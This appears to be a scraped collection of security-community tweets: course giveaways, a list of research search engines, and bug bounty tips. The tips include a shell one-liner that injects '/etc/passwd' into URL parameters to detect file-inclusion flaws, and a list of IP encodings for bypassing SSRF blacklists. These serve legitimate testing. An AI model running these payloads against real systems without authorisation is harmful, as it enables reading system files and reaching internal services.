It’s the time of year again for the world famous InfoSec Black Friday GitHub repo from @securitymeta_ !
This has been a huge hit running over 5 year, and has just about everything a cybersecurity person would want.
(Plus a few things from me as well 😎) https://t.co/rochIGRaQs
Ok fam. I’m giving away TWO free tickets to my course which takes place in two/three weeks.
All you have to do to win is like, retweet this tweet, and reply with “https://t.co/VnOqGJ5Yyo!”
I’ll pick winners next week!
If you haven’t seen my course, check out the link!
30 cybersecurity search engines for researchers:
1. Dehashed—View leaked credentials.
2. SecurityTrails—Extensive DNS data.
3. DorkSearch—Really fast Google dorking.
4. ExploitDB—Archive of various exploits.
5. ZoomEye—Gather information about targets.
Okay here's the deal.
I'm giving away 100 @TCMSecurity training courses. 50 of them are the Practical Ethical Hacking course, and the other 50 are Practical Malware Analysis & Triage.
To enter:
1. Retweet this tweet
2. Follow @hakluke, @haksecio and @hacker_content
Good luck!
THE RELEASE: Disposable Root Servers and Linux Shells for EVERYONE. Try `ssh [email protected]`. Password is 👉segfault👈 #root#linux#hacking
https://t.co/root2pKjMa
Predictable GUID vulnerabilities are often critical and easily overlooked. This extremely practical writeup & tool release by @_danielthatcher is well worth a read:
https://t.co/IaqlOKi5OK
🧠 Maybe it’s just me, but with the constant flow of new information in tech.
I forget stuff that I used to work with/on and know like the back of my hand,
Thank <insert higher power> for search engines, release notes, writeups / blogposts and old personal archives.
A thread🧵
💸Secrets of automation-kings in bug bounty💸
Finding 1day (or 1month) web exploits that haven't made their into scanners yet can make you big money.
Read more to understand where and how to get an edge in this area!
🚨Retweet, follow, & like for more! 🚨
1/x
I was roaming around the blogs and tweets and got some useful scripts that gives us almost accurate results
1. Local File Inclusions
gau HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q " root:x" && echo " VULN! %"'
Can't decide what to attack first?
- Get a list of hosts belonging to target
- Resolve them to IP addresses
- Put the IP addresses into https://t.co/OFBTdDF5wc to see where they are hosted
- Uncover unmonitored/shadow assets by looking for irregular hosting providers
Thread🧵👇
🚨SSRF Bypass🚨
Blacklisting IPs does not work. There are many ways to represent an IP such as 127.0.0.1.
http://127.0.1
http://127.1
http://0.0.0.0
http://0
http://0x7f000001
http://2130706433
http://017700000001
http://[::]:80
#bugbiuntytips#BugBounty#bugbountytip